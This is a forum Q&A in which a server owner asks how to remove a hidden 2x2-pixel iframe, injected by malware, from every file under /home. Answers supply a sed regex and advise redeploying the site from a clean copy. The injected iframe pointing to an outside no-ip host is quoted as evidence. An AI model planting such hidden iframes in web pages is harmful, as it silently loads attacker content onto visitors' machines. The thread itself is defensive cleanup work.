0

We're running a Debian server and we have a malware or something doing code injection.

I know how to search and replace this string :

<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>

I do it this way :

find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'

My problem is the url http://ingvar2000.no-ip.org/jc/rss.php changes from files to files, so how can I search and replace :

<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>

Because the width, height, and frameborder is always the same.

j0k
  • 401
  • 9
  • 16
Docteur_K
  • 3
  • 1
  • 3
    Your site's compromised. Redeploy it from a pristine copy, and then fix the security problem that caused this in the first place. – Michael Hampton Mar 01 '13 at 14:23
  • Yes i sure will but i can't and i have to find someone to do it. Until then, this little fix will avoid the site being listed as malicious by google. At least I hope so... – Docteur_K Mar 01 '13 at 14:45
  • This little fix will be undone quickly by whoever hacked your site in the first place. – ceejayoz Mar 01 '13 at 15:18
  • I know, but again, i can't manage this by myself, i a front end actionscript 3 developper, not bad at all, but i don't know anything about sysadmin... So until i find someone i do what i can :( But still, thank you for carring, it's very nice of you, and be sure i ll do my best to reinstall everything as soon as possible :) – Docteur_K Mar 01 '13 at 16:17

1 Answers1

1

Use

find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'

here [^"]* means 0 ore more characters of anything but ".

Stone
  • 6,941
  • 1
  • 19
  • 33
  • Awsome, thank you very much for your quick and very efficient response ! I might ask for too much, but do you know if it's possible to send an email if the requested string is found ? Thank's again, you saved my day ! Frederic. – Docteur_K Mar 01 '13 at 14:41
  • You're welcome! Just run another script before this to walk through all files and e-mail you all the matched files. Like: `grep -R '' /home | mail -s "Alert" your@address.com` – Stone Mar 01 '13 at 15:12
  • One more time, Thanks ! And since i'm french and we dont really mind abusing people helping ^^ Do you know if it's possible to send the email only if a file matched ? Thanks again a thousand times, it's very kind of you :) – Docteur_K Mar 01 '13 at 16:15
  • You can redirect the `grep` to a file and then check if the file exists and only if it exists send the letter. – Stone Mar 05 '13 at 20:13